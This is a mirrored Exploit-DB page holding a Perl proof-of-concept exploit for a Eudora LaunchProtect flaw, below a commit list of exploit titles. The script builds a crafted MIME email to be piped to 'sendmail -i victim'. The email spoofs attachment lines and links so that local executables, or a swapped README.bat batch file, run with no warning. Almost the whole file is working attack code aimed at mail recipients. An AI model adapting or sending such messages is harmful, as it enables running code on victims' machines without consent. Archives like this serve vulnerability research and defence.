bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/23399.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

98 lines
No EOL
4.1 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/9101/info
A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions.
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.
#!/usr/bin/perl --
use MIME::Base64;
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";
print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";
#print "
#(Within plain-text email (or plain-text, inline MIME parts) embedded
#CR=x0d characters used to get converted internally into a NUL=x00 and
#ignored, so we could spoof \"attachment converted\" lines.
#At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n";
print "\nThe <x-xyz></x-xyz> constructs (x-html, x-rich or x-flowed)
allow spoofing attachments easily.
The following work fine (but put up warnings):\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc.exe\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc.exe>file.exe</a>\n";
print "These have broken icons, but execute without warning:\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc>file</a>\n";
print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file.exe</a>
(get warning)
<br>and
<a href=c:/winnt/system32/calc>plain file</a>
(no warning) references.
<br>(Or can do
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references; the latter
<br>seems to run with IE, regardless of default browser settings.).
</x-html>\n";
print "\n\n<x-rich>
Can also do RTF inclusions. Can that be abused?
</x-rich>\n\n";
print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
$z = "Can no longer spoof attachments in quoted-printable parts, but\r
still can within base64 encoded (plain-text, inline) MIME parts:\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r
Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n";
print encode_base64($z);
print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";
$X = 'README'; $Y = "$X.bat";
print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or after some blurb so is scrolled off in
another screenful) also send $Y. Clicking on $X does not
get it any more, but gets $Y and runs without any warning:\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";
#print "\nIf we can guess the full path to the attach directory then can
#change the name shown to anything we like, but get broken icon:\n";
#print "<x-html></x-html>Attachment Converted: attach\\README\n";
#print "<x-html></x-html>Attachment Converted: <a href=H:/windows/.eudora/attach/README>file.txt</a>\n";
#print "\nFunny: I thought that since version 6.0, LaunchProtect handled
#the X-X.exe dichotomy (in the attach directory only)...\n";
print "\n";
print "\n--zzz--\n";
print "\n";
Reference in a new issue View git blame Copy permalink